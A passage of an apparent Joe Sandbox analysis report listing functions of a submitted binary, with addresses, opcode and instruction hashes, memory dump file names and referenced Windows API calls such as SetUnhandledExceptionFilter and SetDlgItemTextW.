                                                                                                                        • Opcode Fuzzy Hash: 44645025dff5a23947ce2adc8d96133aad80d36d358c79fed7cd7f5106e651ea
                                                                                                                        • Instruction Fuzzy Hash: 62C14972A183418FC354CF29D840A5AFBE2BFC9308F19892EE998D7311D734E945CB96
                                                                                                                        Function 00EAF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00EAF3A5), ref: 00EAF9DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 39c34925be7d3d1145f6909cb6ece059732acc1344308bd7706800fe57305f4f
                                                                                                                        • Instruction ID: bc06cf3b59c64cf2db91f4870f468e57958275afeb9cc90dbe3655f876e81678
                                                                                                                        • Opcode Fuzzy Hash: 39c34925be7d3d1145f6909cb6ece059732acc1344308bd7706800fe57305f4f
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 00EBC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: ff1b0339e342edb574269d72b309ceb3f59cf7d69a473319ae73c8d1a2ee9f2e
                                                                                                                        • Instruction ID: ee98387cdedc4b0826d59741c1d904229ee1904ec0c36ca804da26605d4ae900
                                                                                                                        • Opcode Fuzzy Hash: ff1b0339e342edb574269d72b309ceb3f59cf7d69a473319ae73c8d1a2ee9f2e
                                                                                                                        • Instruction Fuzzy Hash: 23A012301022018F83008F325E086083695574018030940695104D0020D72040549600
                                                                                                                        Function 00EA62CA Relevance: .8, Instructions: 829COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction ID: 7e1f6df520ef468ffa7c4532af02cf7ddee7c6f18d31cfa2dbb0606c10621497
                                                                                                                        • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction Fuzzy Hash: 3662C4716047848FCB29CF28C4906B9BBE1AF9B304F09996DE8DA9F346D634F945CB11
                                                                                                                        Function 00EA77EF Relevance: .8, Instructions: 817COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction ID: 02404746bfbea793f989514b5f34ef97c734c50af217757c949c8733bb539c8d
                                                                                                                        • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction Fuzzy Hash: D162C4716083458FCB19CF28C8905AABBE1EF9A304F18996DE8DA9F346D730F945CB15
                                                                                                                        Function 00E9F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction ID: 85507197fc07bbef7e7741ab11816dfed25b70257100489fd530253127285a5e
                                                                                                                        • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction Fuzzy Hash: 92525A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                        Function 00EA7153 Relevance: .5, Instructions: 536COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 157163a9a2021bae5393c3b50c8ba8f1fcd86aec74f5ebfe0ea2718171ba6081
                                                                                                                        • Instruction ID: e606c3a04c3fb9d6346971238f0377a277ee5aeaaf666c0a460b6a8566bf2330
                                                                                                                        • Opcode Fuzzy Hash: 157163a9a2021bae5393c3b50c8ba8f1fcd86aec74f5ebfe0ea2718171ba6081
                                                                                                                        • Instruction Fuzzy Hash: 6112D3B16187068FC718CF28C890AB9B7E1FF99308F14592EE9D6DB680D334B995CB45
                                                                                                                        Function 00E9C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 591cfb689b9529cf50b6792a5df7bfa1fd688ce3faa83dce84725cc439fee64b
                                                                                                                        • Instruction ID: 64a8596bf38ae85c1fa69277a1902882a504bb60a9250c6f8d38470084ccfb9f
                                                                                                                        • Opcode Fuzzy Hash: 591cfb689b9529cf50b6792a5df7bfa1fd688ce3faa83dce84725cc439fee64b
                                                                                                                        • Instruction Fuzzy Hash: 9BF1BF716093018FCB18DF28C48466ABBE1EFC9718F256A2EF5C9E7252D630E945CB42
                                                                                                                        Function 00EA6CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: faab208492da0ab687c81691aa6134c94f3925f1f1cf124da5169e3f9807417f
                                                                                                                        • Instruction ID: 99c6f889bdcc0ffe817e2e54fc00bce64062f2f6cfa4eaa846a10b4db4fc3841
                                                                                                                        • Opcode Fuzzy Hash: faab208492da0ab687c81691aa6134c94f3925f1f1cf124da5169e3f9807417f
                                                                                                                        • Instruction Fuzzy Hash: 1AD183756083458FDB14DF28C88479BBBE1AF8A308F08556DE889AF242D774FA05CB56
                                                                                                                        Function 00E9E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dfec249b7f7b69ca7624ca487da260e34fd769cb51e6d3f7cbe58714f6c224b9
                                                                                                                        • Instruction ID: 3c3a983644299b44dc22ae52192cba0660d05f8e977302322830f395241b92de
                                                                                                                        • Opcode Fuzzy Hash: dfec249b7f7b69ca7624ca487da260e34fd769cb51e6d3f7cbe58714f6c224b9
                                                                                                                        • Instruction Fuzzy Hash: DAE129755093948FC304CF59E89046ABBF1EF9A300F46095FF9D4A7392C236E919DB92
                                                                                                                        Function 00EA4088 Relevance: .3, Instructions: 270COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction ID: f91f56b8d212730bdd5af99b958c8010388d2095cd3810ba23a37dcc98743201
                                                                                                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction Fuzzy Hash: 4D9178F02003458BDB28EE64D894BFA77C5EFEA304F10192DF596AB2C2DAA4B545C352
                                                                                                                        Function 00EA43BF Relevance: .2, Instructions: 243COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction ID: e44ad4cb16132b5442f1bfb0e6bbb95b5d6a51eb1f42e59e346580bd625e0ec2
                                                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction Fuzzy Hash: B3814AF17043454BDB34DE68C885BBD37D1EBDA308F04193DE996AF2C2DAB0A9858752
                                                                                                                        Function 00EB51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ce8eb9efa21253b448dffa134721f4f86c0e960f10f644c60c44ce0996493a2
                                                                                                                        • Instruction ID: 7c3a8fb5ba97b3792cae4cfd25f5eefc2f36124ce6d7e9e9acb25c235954d5b0
                                                                                                                        • Opcode Fuzzy Hash: 8ce8eb9efa21253b448dffa134721f4f86c0e960f10f644c60c44ce0996493a2
                                                                                                                        • Instruction Fuzzy Hash: 9C618933600F085ADA389A68A8957FF63E4EF51748F14392AE583FF3A1D292DD428651
                                                                                                                        Function 00EB4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction ID: 9052712615570abb58130f08146d463bf72a06bb140925a56bc31425c5039f95
                                                                                                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction Fuzzy Hash: C05146A3304F4557DF396A6C9596BFF23D99B02308F183819E982FB2C3C615ED058391
                                                                                                                        Function 00E9EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a19ed88ad2b5eac6836983479a0da1335db3e8046a98f39ed76fa66afe8a0ec2
                                                                                                                        • Instruction ID: 41d074301c038c287f3112418fc82ea84c7d7b1f2c4746c1733ddd9e59d13887
                                                                                                                        • Opcode Fuzzy Hash: a19ed88ad2b5eac6836983479a0da1335db3e8046a98f39ed76fa66afe8a0ec2
                                                                                                                        • Instruction Fuzzy Hash: A051E8315093D58FCB11CF35C54046EBFE4AF9A318F5919AEE4D9AB243C231DA4ACB92
                                                                                                                        Function 00EA00B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e24977e78387be144b3fd9f8ae55d01540392d8d9e45f055e62e9de2f53e570
                                                                                                                        • Instruction ID: 2cd7c097e7f8d9279652e9aafb1be90b71e8058234d034716ffdc2a35f440418
                                                                                                                        • Opcode Fuzzy Hash: 0e24977e78387be144b3fd9f8ae55d01540392d8d9e45f055e62e9de2f53e570
                                                                                                                        • Instruction Fuzzy Hash: F651EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E7340D735EA59CB9A
                                                                                                                        Function 00EA3E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction ID: 24f11cdd7e31e2767b799370de07f75e9627bf3e9aded393362f37036fbad521
                                                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction Fuzzy Hash: 4331C6B1A147468FCB28DF28C8511AABBE0FB9A304F14552DE495EB341C735EA0ACB91
                                                                                                                        Function 00E9E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E9E30E
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EA1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00ED1030,00000200,00E9D928,00000000,?,00000050,00ED1030), ref: 00EA1DC4
                                                                                                                        • _strlen.LIBCMT ref: 00E9E32F
                                                                                                                        • SetDlgItemTextW.USER32(?,00ECE274,?), ref: 00E9E38F
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E9E3C9
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E9E3D5
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E9E475
